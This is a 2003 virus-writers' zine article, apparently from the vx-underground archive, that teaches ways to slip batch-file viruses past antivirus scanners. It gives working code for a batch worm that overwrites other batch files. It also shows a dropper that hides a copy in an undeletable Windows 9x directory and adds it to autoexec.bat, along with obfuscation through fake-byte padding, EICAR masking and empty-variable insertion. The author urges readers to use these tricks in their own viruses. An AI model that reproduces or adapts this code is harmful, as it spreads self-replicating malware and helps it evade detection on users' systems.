,, MMP""MM""YMM `7MM P' MM `7 MM MM MMpMMMb. .gP"Ya MM MM MM ,M' Yb MM MM MM 8M"""""" MM MM MM YM. , .JMML. .JMML JMML.`Mbmmd' `7MMF' `7MF' `7MMF' `7MMF' `MA ,V MM MM VM: ,V `7M' `MF' MM MM .gP"Ya ,6"Yb.`7M' `MF'.gP"Ya `7MMpMMMb. MM. M' `VA ,V' MMmmmmmmMM ,M' Yb 8) MM VA ,V ,M' Yb MM MM `MM A' XMX MM MM 8M"""""" ,pm9MM VA ,V 8M"""""" MM MM :MM; ,V' VA. MM MM YM. , 8M MM VVV YM. , MM MM VF .AM. .MA..JMML. .JMML.`Mbmmd' `Moo9^Yo. W `Mbmmd'.JMML JMML. ,, ,, ,, .g8"""bgd `7MM `7MM mm db .dP' `M MM MM MM dM' ` ,pW"Wq. MM MM .gP"Ya ,p6"bo mmMMmm `7MM ,pW"Wq.`7MMpMMMb. MM 6W' `Wb MM MM ,M' Yb 6M' OO MM MM 6W' `Wb MM MM MM. 8M M8 MM MM 8M"""""" 8M MM MM 8M M8 MM MM `Mb. ,'YA. ,A9 MM MM YM. , YM. , MM MM YA. ,A9 MM MM `"bmmmd' `Ybmd9'.JMML..JMML.`Mbmmd' YMbmd' `Mbmo.JMML.`Ybmd9'.JMML JMML. -- Contact -- https://twitter.com/vxunderground vxug@null.net

intro words

While making my Batch WOrm Generator I discovered much very useful techniques for Batch viruses, for instands about Encryption or Polymorphism. But I discovered also some other techniques. These are Anti AVA techniques, and I thought, I don't have to let them die. Now let's start...


I'm sure, that you want to know, about which techniques I want to talk. So, here is the shit of content :)

  1. Including fake bytes
  2. Useing a undeletable directory (Not for Win00|NT|XP)
  3. Including the EICAR-Testfile
  4. Pseudo-Trash between the code

Including fake bytes

This is a special Anti-KAV-heuristic technique. Maybe you know, that KAV only searchs in the first 1000 Bytes for the virus (I think, only in batch viruses). What does that mean for us? Guess what? :) We inlude befor of the start of our virus 1000 silly bytes, which don't do anything. And what is t effect? Let's test it. First we have a very silly code-string, that only spread itself in the current dir via overwriting Batch-files. KAV named it 'BAT.Silly.d'.


for %%a in (*.bat) do copy %0 %%a

Now let's test our new technique. Includeing 1000 fake-Byte should not be a serious problem. Because of the fact, that batch ignore simple input-errors we won't have any problems with it. My string contains random lowercase-letters. But it should be no problme to include also other letters like Uppercase or numbers and so on. Important Note: Do not include a '<' or a '>', because the computer will 'think', that you want to read/write from a file.

Fake Bytes


for %%a in (*.bat) do copy %0 %%a

The thing looks damn stupid, but the effect is genial :). The whole virus works, but KAV don't show any alarm. And also no heuristic alarm. I'm sure, that you will like this technique very much.

Useing a undeletable directory (Not for Win00|NT|XP)

This technique's name looks very cool. And don't worry, it IS very cool. But first let me explain, what it is: Windows 95 and Windows 98 have a bug. If you try to make a new directory in MS-DOS, which contains some special letters, windows won't be able to work with that directorys. You can't open the directory, move it or delete it. That's the princip of our technique, because of the reason, that batch is a DOS script. Now let's have a look at letters, which make that possible.

Letter List

ASCII  176: °
ASCII  177: ±
ASCII  178: ²
ASCII  179: ³
ASCII  180: ´
ASCII  185: ¹
ASCII  186: º
ASCII  187: »
ASCII  188: ¼
ASCII  191: ¿
ASCII  192: À
ASCII  193: Á
ASCII  194: Â
ASCII  195: Ã
ASCII  196: Ä
ASCII  197: Å
ASCII  200: È
ASCII  201: É
ASCII  202: Ê
ASCII  203: Ë
ASCII  204: Ì
ASCII  205: Í
ASCII  206: Î
ASCII  213: Õ
ASCII  217: Ù
ASCII  218: Ú
ASCII  219: Û
ASCII  220: Ü
ASCII  223: ß
ASCII  242: ò

OK, we know all the chars, which are possible. Now let's make a little sample with that technique. My sample makes a undeleteable directory in %windir%, and write something to the autoexec.bat, which let the virus start at every windows-run.

Letter List example

@echo off
cd %windir%
md º´ÜòÌ
cd º´ÜòÌ
copy %0 virus.bat
echo cd %windir% >>autoexec.bat
echo cd º´ÜòÌ >>autoexec.bat
echo virus.bat >>autoexec.bat

I'm sure, that you'll understand the example. A special thanks goes to the Author of 'Trojan.BAT.NoDelDir', but unfortunatly I don't know, who it is. If you read this, please contact me!!!

Including the EICAR-Testfile

I think, that everybody knows, what EICAR-Virus-Test-File is. If not, I'll explain it: It's a com-file from EICAR, and every Scanner detects it. It's only for testing your AV. It's no virus, but it writes a String to the DOS screen. OK, sounds nice, but how can we use it? Because of the fact, that nearly everybody knows about that file, nobody is scared of a warning from his AV about that detection. That's the point. We include to our program the EICAR-file, so useres won't be scared of it. Here is the EICAR file content:



This is the same princip as the fake-bytes. But it contains a sensefully content: The EICAR-file. It's the same 'virus', that I used in the FAKE BYTE including technique. But now it's no more detect as 'BAT.Silly.d' but 'EICAR-Test-File'. And we had success :)

EICAR-content example

%%a in (*.bat) do copy %0 %%a

Pseudo-Trash between the code

The title sounds emazing. So, what do I mean with 'Pseudo-Trash'? Anything, that is written down in the code, but do not exist in the runtime. You may think, that I'm a stoned/drunken or whatever, but it's the only possible explanation. Think about the explanation. What comes to your mind? Maybe the command 'set'? Then you're at the right way. OK, a variable contains any content. But the point is, that a variable can also contains '' (=nothing). Now we solved our problem :) Let's look at the code. It's again the silly virus, which is detect by KAV as 'BAT.Silly.d'.

Pseudo-Trash example

%anyting%fo%anyting%r %%a i%anyting%n (%anyting%*.ba%anyting%t) d%anyting%o co%anyting%py %0 %%a

As you can see, the thing is very (!!!) easy to make, but it's also useful. Note: you have to know, that the variable, that you use, has no content. Otherwise the virus won't work. If you are not sure about the content, include the line 'set anthing=', so you delete the content.

last words

These techniques could be really useful, if you also include other Anti AV tricks. If you include all these things and also encryption or polymorphism or whatever, AVs will have a really problems. Now I hope, that you'll try to use some (or maybe all :D ) of these things in your future-projects, otherwise I wasted much hours of discover the techniques, searching errors and better ways of it, checking the behaviour on other OSes and writing the article. OK, in the end I want to say sorry about my english spelling or grammer mistakes :).

							- - - - - - - - - - - - - - -
							  Second Part To Hell/[rRlf]  
							  written in june 2003
							- - - - - - - - - - - - - - -